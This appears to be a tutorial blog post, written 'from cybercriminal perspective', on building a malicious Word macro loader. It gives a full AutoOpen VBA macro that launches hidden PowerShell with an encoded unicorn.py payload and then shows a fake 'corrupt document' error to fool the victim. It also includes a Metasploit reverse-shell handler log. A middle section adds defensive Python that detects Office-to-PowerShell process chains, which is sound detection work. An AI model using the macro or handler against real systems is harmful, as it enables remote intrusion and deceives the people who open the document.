Docm Macro Beacon Loader: From Cybercriminal Perspective

Goal:

  • Simulate an advanced adversary using macros in .docm documents and PowerShell to create a beacon-type payload generated with unicorn.py (thanks to TrustedSec!)
  • It is similar to the Locky, Cerber, and Carbanak payloads, minus PowerShell

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a Developer tab. Create a new macro, call it AutoOpen, and paste the generated code into it. This will run automatically when the document is opened. Note that a message box will prompt the user saying that the file is corrupt, and the Excel document will then close automatically. THIS IS NORMAL BEHAVIOR! It tricks the victim into thinking the Excel document is corrupted. You should get a shell through PowerShell injection after that.

The full macro script is as follows:

Sub AutoOpen()
    ' Runs automatically when the document is opened
    Dim x
    ' Hidden PowerShell window; the unicorn.py-generated encoded payload is omitted here
    x = "-window hidden -EncodedCommand " "
    Shell ("powershell.exe " & x)
    ' Decoy error box so the victim believes the document is corrupt
    Dim title As String
    title = "Critical Microsoft Office Error"
    Dim msg As String
    Dim intResponse As Integer
    msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
    intResponse = MsgBox(msg, 16, title)
    ' Close Office so the decoy looks convincing
    Application.Quit
End Sub
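From the defender's side, the observable behaviour of this macro is an Office process (WINWORD.EXE or EXCEL.EXE) spawning powershell.exe with a hidden window and an -EncodedCommand argument. The following is an added example written for this post, not code from the original post or from TrustedSec's unicorn project: it scans constructed Sysmon Event ID 1-style process-creation records (reduced to the hypothetical fields ParentImage, Image, CommandLine), flags Office-to-PowerShell chains, recognises the abbreviated switch spellings powershell.exe accepts (-w, -e, -enc, ...), and decodes the UTF-16LE base64 blob so an analyst can read the script. The sample events and the encoded blob are constructed inline and are not from a real host.

```python
"""Added example (not from the original post): detect Office -> PowerShell
process chains of the kind the AutoOpen macro above produces, and decode the
-EncodedCommand blob for analyst review.

Assumptions (hypothetical, constructed for this example):
  * Events are Sysmon Event ID 1-style records reduced to three fields:
    ParentImage, Image, CommandLine.
  * SAMPLE_EVENTS below are constructed, not captured from a real host.
"""
import base64
from dataclasses import dataclass
from typing import Optional

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def _matches_switch(token: str, full_name: str, min_prefix: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of a switch name, so
    -EncodedCommand may appear as -e, -ec, -enc, ... and -WindowStyle as
    -w, -win, -window.  Mirror that so abbreviated forms are not missed."""
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return len(name) >= len(min_prefix) and full_name.startswith(name)


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of a UTF-16LE script; return the script,
    or None when the argument is not a well-formed blob."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    parent: str            # Office binary that spawned PowerShell
    command_line: str      # raw PowerShell command line
    hidden_window: bool    # -WindowStyle hidden (any abbreviation) present
    decoded_command: Optional[str]  # decoded -EncodedCommand, if any


def analyze_event(event: dict) -> Optional[Finding]:
    """Return a Finding when an Office process spawns PowerShell, else None."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_IMAGES or image not in POWERSHELL_IMAGES:
        return None
    # Whitespace split is enough here: the base64 blob never contains spaces.
    tokens = event.get("CommandLine", "").split()
    hidden, decoded = False, None
    for i, tok in enumerate(tokens):
        if _matches_switch(tok, "windowstyle", "w") and i + 1 < len(tokens):
            hidden = tokens[i + 1].strip('"').lower() == "hidden"
        elif _matches_switch(tok, "encodedcommand", "e") and i + 1 < len(tokens):
            decoded = decode_encoded_command(tokens[i + 1].strip('"'))
    return Finding(parent, event.get("CommandLine", ""), hidden, decoded)


def scan(events: list) -> list:
    """Run analyze_event over a batch of records and keep the hits."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


# Constructed sample blob, built from a harmless script so the example is
# self-contained; a real event would carry the macro's generated payload.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # Constructed: the chain the AutoOpen macro produces from Word
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -window hidden -EncodedCommand {SAMPLE_BLOB}",
    },
    {   # Constructed: same chain from Excel with abbreviated switches
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell -w hidden -nop -e {SAMPLE_BLOB}",
    },
    {   # Constructed: benign PowerShell console started from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[!] {f.parent} -> powershell.exe, hidden window: {f.hidden_window}")
        if f.decoded_command:
            print("    decoded -EncodedCommand:", f.decoded_command)
```

The parent/child pairing is the strongest signal: there is very little legitimate reason for WINWORD.EXE or EXCEL.EXE to launch PowerShell at all, so every Office-to-PowerShell chain is reported and the hidden-window and encoded-command details are attached as supporting evidence rather than used as the sole trigger. Matching on switch prefixes rather than the literal strings "-window" and "-EncodedCommand" keeps the rule from being bypassed by the shorter spellings PowerShell itself accepts.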


Attacker’s View:

  msfconsole -r unicorn.rc
  [*] Exploit running as background job.
  [*] Started reverse TCP handler on 192.168.0.196:443
  [*] Starting the payload handler…
  [*] Encoded stage with x86/shikata_ga_nai
